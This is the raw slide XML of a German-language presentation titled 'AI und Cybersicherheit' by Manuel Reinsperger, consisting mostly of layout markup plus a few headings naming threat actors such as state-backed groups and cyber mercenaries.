                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="2277533"/>
              <a:ext cx="2400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3F38170E-B663-4BD1-8412-B17C850238AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="3429000"/>
              <a:ext cx="2400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95F204B1-4F79-4A2B-ABB3-166E881BD4AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="4580467"/>
              <a:ext cx="2400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8878A985-CAE7-4960-9F00-9C6A7F0E9FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="2277533"/>
              <a:ext cx="240000" cy="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C809C926-56D3-4F44-8A9D-E849F9561252}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="3429000"/>
              <a:ext cx="240000" cy="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FCBA42EB-29CD-4123-A771-82392BC1D074}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="4580467"/>
              <a:ext cx="240000" cy="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461745E5-1A8A-49F3-8690-B371CA8567D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695325" y="-316200"/>
              <a:ext cx="0" cy="24000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CED34626-C54B-42F5-874A-643B46F4F438}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11496675" y="-316200"/>
              <a:ext cx="0" cy="24000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404B2769-26AE-41BC-A1FE-74FF6F3CEC83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695325" y="6934200"/>
              <a:ext cx="0" cy="24000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DB4345C2-C303-4870-9964-71FBF4477958}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11496675" y="6934200"/>
              <a:ext cx="0" cy="24000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14D4FA4D-46AA-44E5-B7C4-E7ADCEA5721D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="550333"/>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64B93993-4D5E-4901-B552-D6DDFF53C42C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="6057292"/>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692A99A2-1FCA-4C4B-894E-48510FF141A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="6305550"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26EC749C-FC1F-42D1-AB4D-797C896C0C2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="550333"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D08211-0063-4742-90A9-8442C667F4C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="6057292"/>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Gerade Verbindung mit Pfeil 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E538F83-D42A-4BA6-BE09-0AF34EB7F74B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="6305550"/>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Gerade Verbindung mit Pfeil 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308E746D-A89E-4633-B221-8563AAB5D2A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="1768474"/>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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD918173-F76D-45C4-9C4B-8C48C88EC045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="1768474"/>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Gerade Verbindung mit Pfeil 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6D41FA-CBB1-4AB0-8244-D88EFA3DE535}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-313152" y="5805264"/>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Gerade Verbindung mit Pfeil 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED3E4B0-1C78-47F9-8A2E-6FEA8AE04746}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12265152" y="5805264"/>
              <a:ext cx="24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elplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C00F53-9359-4AD6-A4EB-D077906393F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686475" y="487656"/>
            <a:ext cx="9360000" cy="864000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" noProof="0" dirty="0"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271963FE-A06F-43D7-A95D-F788A714649E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1710678"/>
            <a:ext cx="10800000" cy="4608000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:no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40297512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Lst>
  <p:hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="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800"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr lang="de-DE" sz="2800" kern="1200" noProof="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr lang="de-DE" sz="2000" kern="1200" noProof="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="266700" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="90000"/>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr lang="de-DE" sz="2000" kern="1200" noProof="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="542925" indent="-276225" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr lang="de-DE" sz="1800" kern="1200" noProof="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="809625" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr lang="de-DE" sz="1800" kern="1200" noProof="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570">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="438">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="5110">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="7242">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="346">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="1117">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" orient="horz" pos="1434">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" orient="horz" pos="2886">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="3816">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="3974">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="3657">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" pos="3727">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="3953">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="16" orient="horz" pos="420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mailto:manuel.reinsperger@a1.digital" TargetMode="External"/><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platzhalter 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD2DC9E-6E15-42E2-94DC-68D95C886718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Titel 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47000367-FCEF-4DAB-AD94-936BDB2273CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676950" y="1175249"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>AI und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Cybersicherheit</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Untertitel 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21CA187-429A-4FFB-B5AE-66156BC7803D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="4740774"/>
            <a:ext cx="10800000" cy="1584000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Manuel Reinsperger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Textplatzhalter 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8EC6E94-7DC7-46E1-9432-B849F4989BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="5775987"/>
            <a:ext cx="2516400" cy="543600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131645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DBF23-6B3C-44F6-E6AB-62882D2463CC}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Gruppieren 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753993E0-B1E2-DEFC-38A9-D3885D5835A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noMove="1" noResize="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-4564"/>
            <a:ext cx="12191999" cy="6928656"/>
            <a:chOff x="0" y="-4564"/>
            <a:chExt cx="12191999" cy="6928656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Grafik 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F551CD4E-CFCE-5D3C-D8A0-24D785BEB6C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noCrop="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="22628" r="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6834615" y="0"/>
              <a:ext cx="5357384" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Grafik 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9900C221-D14F-DACD-3E52-445EF0CCA1B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noCrop="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-4564"/>
              <a:ext cx="6924092" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rechteck 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E14813-478D-7C62-8363-558FD272AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="6919528"/>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rechteck 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702B3677-3E11-F710-B3E9-9B4B61F41104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679406" cy="6163139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rechteck 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C138840-549B-7C20-F740-4D12015D6802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-9158"/>
            <a:ext cx="9167085" cy="5371594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rechteck 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05538CDE-8C9A-DB5C-F63C-F9973679648A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="-9158"/>
            <a:ext cx="7654768" cy="4569110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAB0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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Rechteck 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BEB3F69-E8B2-F933-5C05-B2344D4008A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2177" y="-9159"/>
            <a:ext cx="6158787" cy="3766630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E25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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Rechteck 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A18A1D93-20F8-9E85-0448-E6EEA3637D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2177" y="-9159"/>
            <a:ext cx="4646467" cy="2964149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B8231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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Textfeld 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC30C0C-4A52-78DC-AC1A-6FADD0D80659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119336" y="3927766"/>
            <a:ext cx="7333419" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Organisierte Gruppen, Cybersöldner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Textfeld 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8576FE03-E5A9-67CD-D01C-7C08C7D5AE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119337" y="3127849"/>
            <a:ext cx="5760350" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staatlich gestützte Gruppen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Textfeld 79">
            <a:extLst>
